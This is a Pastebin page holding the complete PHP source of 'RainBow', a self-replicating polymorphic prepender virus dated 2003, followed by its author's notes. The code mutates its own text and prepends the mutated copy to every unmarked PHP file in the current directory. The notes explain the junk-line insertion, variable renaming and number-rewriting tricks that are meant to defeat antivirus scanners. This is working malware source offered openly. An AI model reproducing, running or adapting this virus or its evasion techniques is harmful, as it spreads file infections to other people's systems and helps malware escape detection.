Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php // RainBow
- srand((double)microtime()*1000000);
- $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
- $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
- $newcont='<?php // RainBow'.chr(13).chr(10);
- while ($string && $string!='?>'){
- if(rand(0,1)){
- if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
- if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
- if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
- $string=strtok(chr(13).chr(10));
- if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
- $counti=0;
- while($changevars[$counti]){
- $newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
- $countj=-1; $number='';
- while(++$countj<strlen($newcont)){
- if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
- $number=$newcont{$countj};
- while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
- $remn=rand(1,10);
- if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
- case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
- case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
- $allcont.=$newcont{$countj};$number='';}
- $curdir=opendir('.');
- while($filea=readdir($curdir)){
- if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
- if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
- $viccont=fread($victim,filesize($filea));
- rewind($victim);
- fwrite($victim,$allcont.$viccont);}
- fclose($victim);}}
- closedir($curdir);
- function trash($returnvar, $countj){
- do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
- return $returnvar;}
- ?>
Advertisement
Comments
-
- PHP.Rainbow
- by Second Part To Hell[rRlf]
- www.spth.de.vu
- spth@aonmail.at
- written in october 2003
- in Austria
- Technique Information:
- * Poly Engines
- --> Adding Trash/Junk/Garbage
- The Virus adds ine in two lines a junk line to the code.
- This Junk-line could contain:
- - // anything
- - $anything='anything';
- - $anything=number;
- Because the code would be damn big after the 5th generation, I desided
- to delete the trash after every generation and make a new one. Anyway,
- the chance to get a trash-line will be bigger, because there are more
- lines (more lines --> more chance). But I tested about 30 generation
- and it's no big problem with the size.
- --> Changing Variable/function names
- The Virus uses an array with all variable/function names of the virus,
- every generation it changes every array-entry (every name) to a 5-15
- sign long new name.
- --> Number changing
- The virus is able to change every number in the code. This is a real
- sucessfull way to fake AVs, I think! A number (for instands '10') could
- also be one of the following things:
- 10=(8+2)
- 10=(19-9)
- 10=(130/13)
- It's easy to understand, I think. I decided to change ever 5th number I can
- find, because it looks better than changing every number every generation.
- * Infection Method
- --> Prepender
- This code is a prepender virus, which doesn't harm the victim file.
- It reads the first PHP part (which is the whole virus code) of the current
- file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files
- in the current directory, and adds the changed virus code at the beginn of
- the victim file. Before infecting the virus checks, if there's already an
- infection mark or the virus, which is 'RainBow'.
- Something else little interesting is, that it's hard to get many different generations from
- the virus, because it just changes, if it infects a file. And just the infected file has the
- different form, not the old virus.
Add Comment
Please, Sign In to add comment
Advertisement
